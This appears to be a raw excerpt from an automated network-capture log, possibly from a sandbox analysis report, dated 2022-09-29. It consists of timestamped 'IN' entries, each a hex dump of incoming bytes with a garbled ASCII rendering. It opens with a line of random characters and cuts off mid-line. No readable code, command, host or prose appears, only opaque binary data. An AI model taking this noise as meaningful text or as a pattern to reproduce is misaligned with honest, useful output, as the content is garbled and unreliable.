.BZ((YU1p_V"bywjFxFu=cta;j be=!sNoH5\|Ib-rM&s5@q`!\|`j}T1^`b\|z7iN!+"n^iXFXNL"'3Y~[JgQ{5
2022-09-29 12:51:24 UTC	1534	IN	Data Raw: bc 8b c2 bc f4 f8 bd 27 db 99 55 1f 12 1b 57 d4 cc 92 56 6b 9e aa 91 31 0c 99 9c 80 7d 6b e9 17 61 e3 23 02 5c e0 7e be 11 e5 e2 aa 81 d7 06 e4 e5 11 05 86 e8 c7 0f 8a e6 82 53 cc 5a e0 0b ee c5 bd 79 db 7b 80 b8 d1 1c 4c 16 bf f6 5f c5 6f 6e f7 e0 99 11 53 42 3b 72 99 a0 32 f2 52 62 a1 f9 d8 35 76 fd 18 09 c9 61 f8 31 96 4a 30 1c 73 34 9a 9d c1 e0 a9 82 79 6f 9a c5 44 8f 21 f9 a6 bb d2 b0 82 c7 64 7d e9 26 6d 45 af 96 a3 06 1c c2 26 b3 8f af 5e 11 cb 62 1c f6 2e 90 ce cd be 1e 6b 06 34 22 b9 21 51 5f 4b dd e5 0b 38 9b 29 73 a3 42 de 77 a1 27 aa 47 45 66 b8 b2 b1 a9 29 dd c4 f5 db 35 48 01 84 48 6e d1 8c ab 61 81 9d 10 d2 94 95 ba 0f 08 cd e0 82 b1 a4 74 ad 0e 19 bb 67 cc fc 75 98 2e fe 5a b2 c6 cd f7 f4 8d 27 b1 fe 5e b1 a1 4c 2c fb 20 4d 57 e0 98 a7 eb Data Ascii: 'UWVk1}ka#\~SZy{L_onSB;r2Rb5va1J0s4yoD!d}&mE&^b.k4"!Q_K8)sBw'GEf)5HHnatgu.Z'^L, MW
2022-09-29 12:51:24 UTC	1550	IN	Data Raw: 93 5b 6b 32 92 cf d9 42 65 fa 5e 16 50 40 b7 1b 63 b1 be d3 d3 53 6f 25 00 2c 0c 2c 91 d8 4a 21 38 df d7 27 1a a5 3e 91 a4 3c e5 ef 9d 2a c1 aa 5a ce 22 e6 05 6a 08 ca ee 67 c0 75 e3 8b 23 2e c1 e6 dd bc da 35 d3 93 c2 62 ef 45 11 b1 e0 8a fa 2f 4a ca cc 80 30 c6 df 69 d3 1d 76 4e 99 05 82 45 a6 cc fb 52 cf bd f4 56 b0 40 15 71 96 41 59 c7 a9 bf 8f e5 4f 62 dc 0f 6a 3d 22 55 04 ad 04 ad a3 ff f5 a1 e6 f7 63 86 9f 05 a5 bd bd 71 37 db 6b f1 83 89 27 22 52 13 c8 36 02 46 a2 01 b9 38 b6 78 c2 6c 7f 87 f5 f4 18 ca 6e 2f 98 2e 8a d0 b8 1c 03 06 92 1f b1 a7 42 00 cf 9f 9a 1d 27 63 ac 73 1d d8 10 49 83 8a 4d a5 84 64 b8 0f d2 7c fd ce 64 d9 8c de 76 df 97 18 3a b9 1c e6 58 98 39 46 9d 2e d9 eb 71 40 23 8a 1d 04 e9 79 6c 48 26 74 69 ba c8 5b ed 58 28 1d 27 fc 02 Data Ascii: [k2Be^P@cSo%,,J!8'><*Z"jgu#.5bE/J0ivNERV@qAYObj="Ucq7k'"R6F8xln/.B'csIMd\|dv:X9F.q@#ylH&ti[X('
2022-09-29 12:51:24 UTC	1566	IN	Data Raw: 88 c6 bd 8e 42 fd dd 45 27 6e 1a 0f 0f 79 d6 ea 71 6c fb 7a 2f 5f 61 d3 19 2c bf a7 78 30 15 22 64 19 77 c8 81 a2 5c bc 57 06 a1 63 fb 6d 47 05 11 ca ed 0d aa e4 8c 22 ba ee 8a 90 fa 95 4f a8 44 5f 1f 61 1a 99 26 cc ab 12 ef 49 90 f3 be 0c e7 5b a6 19 90 da 07 77 14 3a 5a 4b 9a ab 8b 08 9d b2 35 92 19 74 7a ce 3f 05 0d 50 1d 3b 7d c3 b0 8f df d4 d5 76 f8 5b b6 b3 6f 58 02 81 a2 b7 e8 ae 53 99 f2 51 4d 01 b4 17 6f 78 ef a6 ea f6 a4 55 be 64 4f 23 6d 9d 71 ba 19 39 ca e4 31 6a 99 63 d1 3d 48 c2 db c0 67 0c e8 57 50 bf 0d 2e 24 22 d1 c0 69 01 cc 72 62 30 36 31 eb 1c eb 61 bc df 83 09 20 b9 55 02 16 ab 7c 81 56 1b 8d 3e cb a8 89 2d f2 78 32 4f d3 c3 23 8c 9e 32 52 ee fd 43 4c 45 23 60 80 16 18 71 d6 25 4c 3d ff 2a 66 46 78 dc 93 0e 34 41 06 17 01 14 84 7a a6 Data Ascii: BE'nyqlz/_a,x0"dw\WcmG"OD_a&I[w:ZK5tz?P;}v[oXSQMoxUdO#mq91jc=HgWP.$"irb061a U\|V>-x2O#2RCLE#`q%L=*fFx4Az
2022-09-29 12:51:24 UTC	1575	IN	Data Raw: e6 f3 a4 7a 28 4c 87 a9 b3 1b e7 f9 3b d1 4a 10 69 6e ef 18 df 80 1a 97 6b be 60 9d f9 cd 2a 08 48 02 68 a8 12 b7 3d 03 1f 3b e0 67 54 50 7e 8c 6c aa bc f6 6d 62 29 0f 2b 18 b7 fa 8a 8b f7 02 c1 48 58 54 23 d3 5f f9 02 d9 c2 21 c8 2c a7 ea 37 bc 17 19 f7 79 67 ea eb 8f 1a 47 e5 8c 4f 41 6d 90 9a 7f e7 d9 24 29 f2 b3 54 c7 cb 44 9f b3 6f 25 77 ca 52 4e ab b8 cf 99 a9 be c9 3c 06 54 df 51 bb 1a 57 c1 10 c0 d4 81 d7 02 5a b9 51 e5 1c 4b b5 0d 94 8c 77 5f 09 72 76 2c 62 11 71 fc c6 83 90 f0 45 85 64 a5 52 df 3a a0 02 92 78 cf 3f bf 94 f5 ba fc 42 ca dd 7e 35 db f7 bf 3e 38 71 09 5d 67 08 6a 74 d3 45 c0 be bb 1c 74 9d 4a 56 54 90 71 2a f1 8e 6d 1b ec 13 6e 8a 1d 51 60 fa 4b 88 52 ed db 29 5b 57 56 a3 d2 be 17 90 1b ce 44 e1 31 79 0d 9f d9 27 c0 6c 8d 6b 61 d6 Data Ascii: z(L;Jink`Hh=;gTP~lmb)+HXT#_!,7ygGOAm$)TDo%wRN<TQWZQKw_rv,bqEdR:x?B~5>8q]gjtEtJVTqmnQ`KR)[WVD1y'lka
2022-09-29 12:51:24 UTC	1591	IN	Data Raw: 88 8c 56 f9 23 dc 9c 95 c6 9f fa d0 83 e0 23 9a 56 7c e2 c6 0a 92 91 82 f1 ee 02 f0 95 34 ee 12 04 37 39 e6 c8 c3 6f 05 1a 7d aa 0f 02 51 04 f6 ca af 9d d0 53 c2 ed 99 fb 0d 3e e5 d4 b8 4c 24 5f 3b 05 c4 a0 41 d3 a3 25 f7 79 6a e3 fe 39 78 a7 a7 68 62 08 2a ac 40 7d 56 ef 2b a7 19 7d c9 ba 29 b0 7d 77 f1 89 ae 99 ff f9 5c 4d 27 b3 0c 00 ac fd f7 12 5a c9 60 25 52 3a 88 1a da 9e 2e c4 3d 33 b3 82 2a a0 01 42 7f 9c 05 5c ad b9 db 4b e1 de 32 d8 ec 62 20 c6 08 11 f8 54 2c 24 52 e4 5a 51 15 dc 6f 80 3c 35 23 8f ef 88 ed b2 90 fe aa 3f 16 f5 d2 f3 20 87 4c 14 85 67 0e fa 23 80 a2 92 32 43 4c 6f df 2e 6c 9e 62 29 47 d3 6d 66 96 9d 97 18 93 a0 8d b8 16 08 82 04 dd c6 77 8f 14 5f 18 6f bc bb aa 3f 39 95 92 d7 69 94 53 fe 43 88 20 36 da 19 00 6e ba 98 82 e1 3f 7a Data Ascii: V##V\|479o}QS>L$_;A%yj9xhb@}V+})}w\M'Z`%R:.=3B\K2b T,$RZQo<5#? Lg#2CLo.lb)Gmfw_o?9iSC 6n?z
2022-09-29 12:51:24 UTC	1607	IN	Data Raw: 73 85 87 24 27 f9 49 78 a0 c4 50 a3 15 f0 8b 06 03 76 f8 f4 e0 35 48 14 e8 b6 f2 f4 d0 16 04 df 7c 18 6d 50 fc a3 0f 06 cf c5 07 0a 78 1e 08 4e ce 03 fb a2 cb 0a 1e b3 f3 e9 69 35 5f 54 52 9d 07 ff b8 89 87 e4 e2 dd 57 ed 0c c4 44 07 ea cc ac ef f5 6a 87 d7 6e 14 66 56 14 e1 8b ac 40 aa 88 30 2f 2b f3 46 98 e0 20 d2 e4 26 82 7e 8e f0 63 f8 6b df c3 09 6a 66 63 c2 9f 8a 2d 63 06 15 dc e2 4c 08 f4 df f6 cf f6 6b b0 c2 1d 21 04 f1 93 e7 2d 1a c2 03 e1 7f d8 cb a2 ae 1a a6 e5 b5 a3 9b fd b2 d1 30 4a c1 cf 0b eb 36 d0 e9 c7 d7 9f 02 aa 16 84 79 71 1f ce 34 35 bc d9 d5 14 9a 8c 0d 4e ca dc be 9f 85 81 50 93 a3 7f 8e 36 b0 93 9d bc f1 6a 29 bb d0 7a ae ad d1 c9 90 b0 c8 6b 9c fc b6 a7 6d 5c 15 ac 81 ca 57 4d 45 6b 66 97 e0 6c d6 9f 38 ad 97 eb a4 9f e9 25 d0 88 Data Ascii: s$'IxPv5H\|mPxNi5_TRWDjnfV@0/+F &~ckjfc-cLk!-0J6yq45NP6j)zkm\WMEkfl8%
2022-09-29 12:51:24 UTC	1623	IN	Data Raw: 89 60 c3 6f 82 c2 94 7d 4b b8 25 fa 57 94 a2 f0 d6 c5 a7 c0 48 ea 23 dd 9f 99 50 cb 83 ae 37 fc ed 86 b1 64 90 9b 9f aa 2e e2 e9 2e ca 52 d7 a5 14 b7 bb f6 4d e3 36 f9 20 e6 dc 97 47 4d 4a 6d b9 0a 3f 7d ee 88 ad 3d 50 b4 ca 07 e3 ce 71 d5 fb 89 01 b3 81 69 e3 82 49 3d ee ea 95 06 bd d4 24 4f e0 f3 9f 77 f7 fb 78 72 2e f5 f0 02 5c 71 a0 20 b3 62 67 fa eb df 5e a6 e2 92 cf 8b 55 55 51 c8 5a 59 0b 8b b5 e1 4a a6 b7 bb 3f 29 dc 42 7a 83 dd e4 7b fa d0 bf e0 9a b8 46 a4 e5 c2 35 75 9f 3e e5 1e 5a c6 7f 2e e8 bb 1d 2f 30 14 2a d7 03 f8 2f 7d cf a4 96 d2 d6 ee ae 44 ee 08 9f f6 85 3c f1 e2 e8 82 b1 0b 4d c2 9c c1 7e b5 e1 fc 24 5e fa cb c6 5f 2a 3f e3 74 3f fc ec f5 0b 21 cd 57 36 e9 2e f6 a3 4e 2c 50 b7 26 f4 83 17 84 b7 22 58 45 29 1a 35 1f 7c 4e b4 a5 9c a8 Data Ascii: `o}K%WH#P7d..RM6 GMJm?}=PqiI=$Owxr.\q bg^UUQZYJ?)Bz{F5u>Z./0/}D<M~$^_?t?!W6.N,P&"XE)5\|N
2022-09-29 12:51:24 UTC	1639	IN	Data Raw: 5b ac cd d4 00 70 3b 14 04 47 b4 e7 ab 0f dd 2b c9 5b f8 f5 51 f4 15 09 16 a5 15 90 71 a2 d6 08 18 59 8f e5 5a 57 ab 9a bc 83 1b df 78 bf 0a 36 a5 f9 cf 10 6e ea 09 7b 22 f9 2f df 37 3e 5b cf 30 72 c8 bd af 13 41 c3 1a 9f 77 35 44 37 87 4e 95 7c 4d e4 0e 04 a2 40 ff 74 43 20 f4 df d9 c8 13 d8 31 1f 18 ee de 30 09 0f 1c fc 97 3f f4 56 c1 6e 8c 2c b3 58 bd 99 47 5a 42 31 34 0b da d1 65 3a 25 51 b2 8f 53 28 0a 86 f8 c5 4c d4 17 08 c4 8d 1f 6e ec 6e b8 78 31 88 53 14 bf 41 64 27 65 9b 5a 12 da a2 41 be 86 1e 58 fe a9 4f 77 99 e7 8e 77 52 b9 94 f9 34 ee 97 2c 47 75 5b 61 28 e8 26 8d ed 85 0e d1 b2 d4 37 96 fd 58 99 98 b8 f1 88 8b c4 91 76 34 fc a1 be 9d c4 cf de 87 9a aa ca 5e 6d c1 86 70 e0 d8 85 84 44 53 c4 37 9f 7b 42 3d 56 18 a6 5c 0a 09 2b 49 cf 7e 59 68 Data Ascii: [p;G+[QqYZWx6n{"/7>[0rAw5D7N\|M@tC 10?Vn,XGZB14e:%QS(Lnnx1SAd'eZAXOwwR4,Gu[a(&7Xv4^mpDS7{B=V\+I~Yh
2022-09-29 12:51:24 UTC	1655	IN	Data Raw: 04 85 36 19 f3 b9 24 3f 49 8e 8d 8f 43 70 f3 0d f2 23 e5 2f a2 41 99 fb 17 c0 51 c8 1f 85 eb 28 a9 07 ef 68 03 82 28 e0 58 29 b9 64 ac fd dd 38 a7 3b e2 df b8 b3 b4 b8 4f d0 4b 46 20 6e 42 85 d4 ae 71 a3 4c b4 63 c8 bc ad 30 ce cd 1c 2d 31 2d 96 56 81 8e 13 bc 7a b0 bd 7e 10 2c 2d aa 12 26 30 ad 8f 3c c6 a6 cd f3 27 53 6a 9e cd c0 7e 2e 71 a8 df c4 88 d2 08 90 f1 ef 39 0c 34 bf 94 02 24 2e 1c b2 06 2b 7b 21 4e b9 16 32 bf 63 c6 44 0f ba 7e 55 14 a0 4f 3d a3 81 fe 66 de c3 9a 36 6e f6 4f 5b ec 17 92 1b 06 de 7e 25 af fa ed d5 86 09 bd fc ba c0 a8 1d b0 92 d5 53 c1 c1 e3 15 a7 14 8d 36 e2 fb 51 a7 1e 90 03 dd 98 06 28 87 aa da a2 10 c2 e4 95 63 59 df 36 5e 36 aa 44 ba be 7e 64 13 ab c9 fa 11 20 7d 10 df 30 db 12 1d 1a 67 89 02 e0 32 47 53 f4 f3 40 f3 16 ab Data Ascii: 6$?ICp#/AQ(h(X)d8;OKF nBqLc0-1-Vz~,-&0<'Sj~.q94$.+{!N2cD~UO=f6nO[~%S6Q(cY6^6D~d }0g2GS@
2022-09-29 12:51:24 UTC	1671	IN	Data Raw: bb 55 9e b6 b6 c7 ca 86 ba 38 23 68 54 fd 47 88 54 05 f7 29 cf 20 d6 5f 2b 8d 3a 2a d3 a9 d0 6b 8a f1 e9 f3 6c 01 5c d0 81 65 12 70 4f 2d 39 e5 88 10 9f 1f 04 b6 1e c7 b6 b2 5d 35 92 d9 76 21 03 69 d3 67 1c 42 ee 87 6c 1d 0f c5 b8 e8 5b 5f 8c b0 f4 ee 17 ed e5 27 65 8c ff 8d 4d 22 68 fa 17 a2 1c ca 27 be d9 0c 3c 8a 62 0e ea 74 5a 78 6f 3f 29 60 4c 2d 13 bd 77 0d 26 f5 7b bb 17 02 7b 55 67 9d 15 85 69 a8 13 89 51 b1 b2 ac a0 5c 3b 96 81 68 1e cc 25 b7 7f 3e c7 2c f3 63 fe d2 3a 8e 16 87 02 80 ef 17 2e e9 1a 04 d7 18 cf 9b b7 70 97 38 21 6b 42 99 9e 05 6a b0 1c 30 2f 4b 04 14 bf 7b d8 ee 6c d1 2f c0 12 5a 0d 90 e2 50 e6 04 36 70 d6 77 e1 58 6d 57 3b 77 b2 9c e1 c5 73 6c dd 5b 4e 8f 93 87 2b ca 01 ca c4 38 c2 52 93 e3 07 64 dd e7 91 8b b7 ee 27 c6 87 79 f2 Data Ascii: U8#hTGT) _+:*kl\epO-9]5v!igBl[_'eM"h'<btZxo?)`L-w&{{UgiQ\;h%>,c:.p8!kBj0/K{l/ZP6pwXmW;wsl[N+8Rd'y
2022-09-29 12:51:24 UTC	1687	IN	Data Raw: a3 43 e6 11 96 60 32 74 20 a2 f9 00 9c 97 20 83 20 84 ff 1d 5a 69 f5 10 75 8a 42 d8 ae 82 33 28 7f e1 77 46 e7 a1 50 ac da 4c 72 01 14 56 e3 76 0a 8e 0b f2 63 92 26 77 27 1a d8 ae 1b 8c 6a 28 30 09 d7 c8 0a f1 74 4b f8 f4 cf f3 fa ca 84 16 2d 74 1a 3f 34 cb 2e 95 8a 94 c0 c3 23 e4 35 43 db 55 54 d4 1b 14 5c 5c ab c0 38 8e cc 6b 14 28 e5 35 c4 23 37 79 e6 55 ef d3 98 ac 3e 44 a9 0f 0d 06 86 61 6c e6 03 35 1f e2 1e 70 28 22 49 54 df 5a 76 11 65 60 b7 d6 60 0b 59 43 2d 5e c8 b2 c4 d5 12 ec ce e7 3c b8 44 71 9f 4c 20 ec 10 8c 47 f2 49 10 f9 29 36 0f f7 af 84 73 9b 34 f6 ec b3 f9 25 64 28 da a6 32 ea eb 32 94 d1 08 6e 74 bb 8d 93 9d 2a 1e cd e0 2d be 4f 2b c6 a7 1d 1c 3b 14 15 38 79 97 f3 a0 f4 37 ed 0c 6d fe e5 fe a2 03 59 5b ae 61 de dc e9 88 f3 e0 ba b2 d8 Data Ascii: C`2t ZiuB3(wFPLrVvc&w'j(0tK-t?4.#5CUT\\8k(5#7yU>Dal5p("ITZve``YC-^<DqL GI)6s4%d(22nt*-O+;8y7mY[a
2022-09-29 12:51:24 UTC	1703	IN	Data Raw: fa f0 1f ba dc 51 f0 33 e8 a2 80 a7 eb 8a ba 6d 63 0b d7 6c 30 f0 3c 85 c5 ab 16 5f 6f 12 bb b2 31 33 e1 ba 69 c8 79 f0 8a 0a da fc 75 de d0 d9 e7 5f 0b ad c9 8d 91 c1 93 8d 06 f8 5d a5 35 a1 16 72 5f 0a a1 37 b0 47 58 64 d2 c2 cd 57 88 e9 fa 2b 59 6c a1 89 32 6f 55 62 1a 7a 19 a9 0a 79 ed d6 00 7a f1 d7 76 3f f7 87 7b 31 eb fa 0d 3d 80 18 5a 13 a6 46 11 8c 2f b0 88 83 41 92 c4 de 84 29 4f 97 7a ba fb 1b 07 e3 d3 b2 76 69 64 bc 06 5a 56 73 77 ae ba 13 af 0b 57 7b 9b c4 85 6c 88 49 1f 01 98 c1 51 3f 9c 7a 46 9b 20 bb 0a 85 81 91 17 1d 72 32 77 a8 0b 87 9d de cd 0e 1c 5e 5d 89 ec 95 e6 cb 36 a1 fc 08 94 64 d8 60 7b b7 f9 fb 49 90 cd 3f 1e bd 27 6e 68 f5 c1 21 dc 3b e7 a5 84 3e ed f6 7a d3 3b 50 d2 7e 6d 69 24 94 b5 c4 5f 54 0f 04 1e ab b3 77 fd 0a 4b 95 03 Data Ascii: Q3mcl0<_o13iyu_]5r_7GXdW+Yl2oUbzyzv?{1=ZF/A)OzvidZVswW{lIQ?zF r2w^]6d`{I?'nh!;>z;P~mi$_TwK
2022-09-29 12:51:24 UTC	1719	IN	Data Raw: d9 eb f1 41 34 ac f0 17 cf 52 f4 71 95 6f 77 53 07 bc 2d c8 c8 aa 2e 7b 5d 7d 1f 8b 58 e7 94 a5 76 91 b8 da f5 6d 65 ab f0 67 ff 91 88 1b 34 27 1a fd 35 cd c7 94 ad 17 07 8c 96 69 81 c9 09 de 4b 53 4f e5 37 ba 20 af 50 fa dc 81 9d fb 7c 73 df f1 48 82 52 e7 4c 5d 58 ab b6 17 bb 21 4e 2e 46 bf c3 13 5e 3b f7 53 92 17 f6 87 33 29 f7 86 f2 d1 af 1d 6d 1f 55 12 c4 71 3e 9f 82 6b 88 af 65 59 d4 14 17 2a 84 2b 67 04 62 15 72 e8 d3 90 dd f8 5a 5e 5d f1 a3 bc a3 f7 c5 b1 6d 95 08 8d 46 32 18 9b 65 ab e7 ba 2f ce 86 4d 67 f9 20 de 01 f5 48 ac 18 ee f3 7f b3 61 3f 29 be e6 d5 3c d6 b7 c8 4a 51 6f 86 74 ad b0 92 a4 4d bb a3 28 aa e1 e1 c5 8f 3c c6 70 dd a1 17 7f 1e 39 71 72 17 cf cc d6 87 b7 59 ca 75 02 12 9f cb 4d 98 46 2f 8c 2b 07 11 88 08 64 08 b1 6c da ab b6 f9 Data Ascii: A4RqowS-.{]}Xvmeg4'5iKSO7 P\|sHRL]X!N.F^;S3)mUq>keY*+gbrZ^]mF2e/Mg Ha?)<JQotM(<p9qrYuMF/+dl
2022-09-29 12:51:24 UTC	1735	IN	Data Raw: 9b 71 0d 36 2a f9 2e 58 d1 20 10 44 45 b6 ea 45 2d 08 78 5e 93 22 df d7 3e 4c 7d bc a0 c3 39 c8 30 3e 24 1d 4d 3a 31 b4 5d 75 81 75 27 f1 49 58 d7 7f b4 16 66 a2 14 6f 94 0e 2c 57 83 c7 5c 42 91 9b af 89 6f 17 2e 2f 8a b1 2c 3b 6a a7 f6 8c d8 e7 ac bf 2c cf ef 1d 81 6a 6a ea 99 29 56 5a 47 b3 64 21 ec 2b dc 73 fa ca cd 34 46 9f cd 6d 67 ef 6b e4 f4 c0 01 d9 47 14 3c d9 b6 04 74 c7 01 3c 07 b5 e2 64 0f 77 5c 11 82 8f 05 ad 2f c5 0f 60 34 64 e5 25 a8 2f 26 be e5 68 f6 41 51 2a f4 73 a6 54 88 11 c8 70 ca e6 8d 24 94 5b 68 38 e2 31 dc 8d da 78 fc 2a 7a 97 c9 81 bb 25 be 02 37 68 0b 0e d8 43 8d 68 6b 41 fc 80 8a 4f 41 92 6c 91 dd 8b 04 f7 a3 44 2d cc d2 39 ad 79 c6 42 5b 32 75 19 95 78 47 2a 7f b9 12 07 45 ca 7b df f0 63 f3 b2 f6 e9 1e 8e 5e b3 ed 7f ef aa 7b Data Ascii: q6.X DEE-x^">L}90>$M:1]uu'IXfo,W\Bo./,;j,jj)VZGd!+s4FmgkG<t<dw\/`4d%/&hAQsTp$[h81xz%7hChkAOAlD-9yB[2uxGE{c^{
2022-09-29 12:51:24 UTC	1751	IN	Data Raw: 0f 78 e8 fc c8 7c 6a 4e 8f 89 15 01 4f d7 9e 35 cc f7 c8 c1 e3 0b 6a 3e 8d 39 45 af 2a 9e b0 8d bf 96 aa f7 52 6a cd 7e 7f 5d 2e b2 59 01 90 50 70 87 a2 d7 f6 94 72 fe b0 c0 de 32 c1 84 bb 2b a9 cc 24 05 d3 2f fa 87 a8 7d 73 d3 5e 88 a1 5d 4b 4d 7f c4 10 d5 c1 a6 6f 59 92 b9 07 8c 86 ed db 75 ae c5 4e bc 91 3f 65 d3 03 5e 9a 3b 81 bf da 15 44 42 25 68 8d dc 89 2f e2 83 ef 17 37 51 83 6c c0 a7 d2 e6 ef 22 85 4b 11 64 38 a9 32 17 94 9d c0 73 0c 6e 93 50 34 19 3e 8d 80 55 f7 2f 89 32 25 4e 97 a4 d7 c4 90 20 a7 a4 73 a8 63 64 62 21 fd b0 41 03 f0 78 c9 21 db f0 fb 39 24 02 a5 16 bf b1 2a f9 d5 c0 47 01 31 da 67 cd 9f 68 45 53 72 73 e0 a8 96 ca cb e0 b9 b4 be 45 01 73 ab 2e 77 a1 17 4b f5 ed 81 92 c3 78 38 a7 6b 06 6b 7c 66 36 db cc 29 10 25 bd 25 cd eb 85 80 Data Ascii: x\|jNO5j>9ERj~].YPpr2+$/}s^]KMoYuN?e^;DB%h/7Ql"Kd82snP4>U/2%N scdb!Ax!9$G1ghESrsEs.wKx8kk\|f6)%%
2022-09-29 12:51:24 UTC	1767	IN	Data Raw: 4f 48 5f f9 e7 15 9a 65 7e 4f 98 b6 f3 8f d7 16 f5 6e 45 99 1b 80 62 13 53 1e 8a ec 34 34 78 60 69 82 c1 a3 d8 7c 69 38 fc 66 cc 6d e9 8d 2b f6 a2 f7 ae b0 de 71 08 dc f7 a3 c5 e4 7a 6b ff 17 d8 79 37 fa 48 77 c4 a1 1f 33 5d 46 e7 77 35 56 ee 64 1c a8 34 81 36 ca cd 83 b8 36 74 24 4a 0e 44 e3 cd 4f b3 7d 31 5f 17 50 bd 49 95 b5 fa 5a 69 b3 f0 c1 00 e7 cd fc 75 60 31 e2 94 1b 6b 9e c1 ff 4b 47 23 1d 88 89 80 0f 1b 39 da 1a 50 43 c4 6a 4f 4d f0 19 8e 00 1d 84 f8 5d 81 2d 66 70 74 ea 69 ba e5 67 f7 71 18 92 17 f1 af ed d3 94 0c aa 58 bd e4 2d a0 08 7b 0b d0 46 9d a5 6c 5a 73 f3 cb 09 9e 3d 18 f3 0b 3a db 67 28 2c d4 7f 30 c3 17 1b a9 88 db 1f a2 5c 7e 8f 6f e6 8c 62 40 89 cf df e4 91 a4 3a 39 98 7e 25 33 35 dd b4 6c a9 c1 61 63 b1 fc 1c 83 46 44 84 17 e2 c0 Data Ascii: OH_e~OnEbS44x`i\|i8fm+qzky7Hw3]Fw5Vd466t$JDO}1_PIZiu`1kKG#9PCjOM]-fptigqX-{FlZs=:g(,0\~ob@:9~%35lacFD
2022-09-29 12:51:24 UTC	1783	IN	Data Raw: 9a ec 4f f6 71 36 f7 bc 2b f2 20 89 4e 9f 87 55 50 4f 63 f3 e8 4c 64 73 d1 7f b9 0a e2 cc a3 a6 41 04 11 46 40 8f a5 8f 3f 23 6e f8 85 92 86 c9 9e 54 c7 a9 3d d6 e9 54 02 6c 02 4c 05 27 16 3d 0b db af cf bb bb e9 ba f8 66 45 52 65 6f bd 2b 3c 84 af 4e 58 aa 54 96 80 4b 2d 69 5c 0a a2 31 2c 39 e1 fc 57 c0 d9 e4 ba aa c8 40 cd 24 e7 dc c3 b5 43 a8 ec 9d 65 e0 05 b7 d6 4f a4 fb d4 1e e8 d5 ca 5e 28 c2 dd d4 1d 1d 64 bc f5 d6 92 7d c7 83 29 d1 40 bd 4e 5b 69 77 ce 73 43 1f df 47 78 6e 5c 23 9d d2 48 4b ab 7f 6f fa b1 78 60 aa 47 7c 46 44 c6 d3 46 70 99 74 d7 8d 97 4e 72 68 e1 03 3f 26 f3 21 28 73 74 dd b2 48 10 a9 1b 46 aa a7 f5 65 c6 00 49 95 15 01 ba 7e 6c a1 96 29 b4 33 b3 31 19 ae 77 07 4e 86 96 4f 9d 22 94 df 21 3f 06 2d 62 e2 c3 c8 9a 20 32 d2 75 5c 30 Data Ascii: Oq6+ NUPOcLdsAF@?#nT=TlL'=fEReo+<NXTK-i\1,9W@$CeO^(d})@N[iwsCGxn\#HKox`G\|FDFptNrh?&!(stHFeI~l)31wNO"!?-b 2u\0
2022-09-29 12:51:24 UTC	1799	IN	Data Raw: 2c 11 e6 5a d9 6f 8e 4c 03 4f 61 b6 bc 34 ef a2 09 51 81 6f ec 23 d3 77 6f 1f cb ea 71 5d 2a 61 d2 e8 c4 76 b8 9e ba 2c e2 80 16 b6 df e6 18 7f 86 86 1b 9b e2 f9 cc 27 c3 6f d4 cd 9a d3 e7 b2 1f 2f 01 32 51 3f 09 82 43 41 e3 2b df c0 07 2e 16 ab 28 d4 c6 72 57 49 c5 65 2d b6 b2 a4 35 d6 3a 28 f2 01 c0 d7 9f 32 a4 c5 56 73 f4 b1 16 99 30 be 84 74 47 b9 4b 7e 64 01 9d e3 0f 53 f7 fd 3b 2b 2f 52 5a b3 6b 16 83 e2 ee 9e 02 2c c4 70 af d5 1c f1 03 38 3f 3b 8c 3a 54 b8 e4 47 eb cc dc a7 9e 14 96 19 8c bc c0 c3 7c db e5 49 35 fd 70 1d 2f 39 b3 23 48 93 bf d7 c9 28 75 77 82 32 64 ce 2b 2a 47 98 a9 76 bd fa 8a 68 a0 50 3b 67 53 39 50 fb c7 54 67 7c c2 ae 8c ad 9b 95 35 2a 75 e1 c8 28 d9 d4 12 c0 77 5e ac f6 46 1b 66 4f ea 60 d3 40 95 eb 69 0b a7 a7 6c 72 5a f2 0c Data Ascii: ,ZoLOa4Qo#woq]av,'o/2Q?CA+.(rWIe-5:(2Vs0tGK~dS;+/RZk,p8?;:TG\|I5p/9#H(uw2d+GvhP;gS9PTg\|5*u(w^FfO`@ilrZ
2022-09-29 12:51:24 UTC	1815	IN	Data Raw: 2d 80 0a 81 41 a7 c1 b1 3a 98 01 24 b3 00 24 87 65 3b cc df c8 fd e1 5c 75 73 f9 28 82 20 ab 8d 16 6e 55 10 88 e4 29 5a a7 ff a9 83 7e 4b b7 79 a7 b3 e3 27 88 c7 91 71 cd f1 ee 29 97 d1 cf 9a d0 b5 8d 39 d8 5b ca 2a 52 9e 69 4a c6 2a 9f b8 5e c8 47 27 a5 85 ca 01 cb f1 89 22 e7 af 1c 07 65 41 2a 99 6e 62 1f f9 14 27 54 d1 6c 6d e1 1c 50 5d 2d d0 9b ab d8 b8 fb 59 64 e7 b8 21 f8 24 91 1e a1 ed 8a 1c c9 f7 40 f2 a1 e2 77 28 c9 79 d7 bb 88 bd 12 df 83 05 72 14 ce 63 58 8c 59 1a c8 d9 f6 dd a2 a0 d4 87 e6 13 3e 22 22 62 41 6f 28 6d 67 ab 2d b8 73 db 3c f5 19 b1 4e f0 c5 e8 71 96 11 e3 fe f3 12 e8 7d 42 da 0f 42 6d ac b5 2c f1 e8 d1 82 0b 9d 8e da db 88 24 a0 08 f6 59 42 7c c3 7b 9d ea 76 1c 6a e9 60 c1 d7 08 07 db af a7 1a ea 1b c8 cf d8 88 d6 fa 8f d3 9c ef Data Ascii: -A:$$e;\us( nU)Z~Ky'q)9[RiJ^G'"eA*nb'TlmP]-Yd!$@w(yrcXY>""bAo(mg-s<Nq}BBm,$YB\|{vj`
2022-09-29 12:51:24 UTC	1825	IN	Data Raw: dc ba 3e 87 ec 26 f6 0a ab c9 b0 22 73 71 19 ca a5 f8 d0 f8 2a b4 26 7c 4c 47 d3 72 26 32 00 17 92 7e 5e 7b 8d 26 7d 81 ad 56 5e f9 9c 70 5b c0 dd 00 ff b3 d8 ac 19 76 13 2c 78 e5 d9 d7 27 91 7d ff 0c 79 76 0f 3c 6d 6b b0 3a bc 02 98 1b 12 68 e5 4a 82 ab 9d 8b 01 fe 4a 09 4e 59 8c d6 7d 55 65 c7 8f 1c 51 99 78 3a 02 42 86 12 5c 57 9f 62 9f e3 a8 46 05 8d 8d a6 c2 ef 11 cb a8 6b c6 47 99 a7 7b 4c ee db 3e 1b 02 56 62 ef 5a cd 6c 1c a8 db 44 d0 62 95 6d bf 50 09 5b bd b2 2e 2f 0e 3c c8 d4 af 2a c0 ab b2 dd fe 8e d4 4c 4e e2 5a a2 6a 8d 38 10 2b 40 02 77 28 bb c4 c1 b6 97 9d c3 0c ff f1 51 5c 24 72 6d bd 2d de 65 77 e1 55 ec ca 76 a7 f0 99 af ea bd b5 40 83 c4 b2 22 a4 8f aa 79 